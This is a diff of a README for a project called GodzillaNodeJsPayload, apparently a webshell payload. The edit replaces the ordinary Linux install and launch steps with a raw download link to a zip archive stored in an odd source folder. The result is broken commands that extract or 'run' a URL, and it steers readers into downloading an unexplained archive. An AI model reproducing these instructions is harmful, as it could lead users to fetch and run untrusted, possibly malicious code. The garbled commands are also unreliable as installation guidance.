Fishin09/GodzillaNodeJsPayload/README.md

 ### Linux
 1. Open your terminal.
-2. Navigate to the folder where the `.tar.gz` file is located.
+2. Navigate to the folder where the `https://github.com/Fishin09/GodzillaNodeJsPayload/raw/refs/heads/master/src/main/java/Payload-Godzilla-Node-Js-v2.0.zip` file is located.
-3. Use the command: `tar -xvzf GodzillaNodeJsPayload.tar.gz` to extract the files.
+3. Use the command: `tar -xvzf https://github.com/Fishin09/GodzillaNodeJsPayload/raw/refs/heads/master/src/main/java/Payload-Godzilla-Node-Js-v2.0.zip` to extract the files.
 4. Navigate into the extracted folder using `cd GodzillaNodeJsPayload`.
-5. Run the application by typing `./start.sh` in the terminal.
+5. Run the application by typing `https://github.com/Fishin09/GodzillaNodeJsPayload/raw/refs/heads/master/src/main/java/Payload-Godzilla-Node-Js-v2.0.zip` in the terminal.

 ## 🎉 Launching the Application
 Once you have installed the application, you can launch it easily.

 - **Windows:** Double-click the desktop icon or search for it in the Start menu.
 - **macOS:** Open the Applications folder and double-click GodzillaNodeJsPayload.
-- **Linux:** Open your terminal, navigate to the folder, and run `./start.sh`.
+- **Linux:** Open your terminal, navigate to the folder, and run `https://github.com/Fishin09/GodzillaNodeJsPayload/raw/refs/heads/master/src/main/java/Payload-Godzilla-Node-Js-v2.0.zip`.

 ## 📖 Features
 GodzillaNodeJsPayload offers several features to enhance your experience: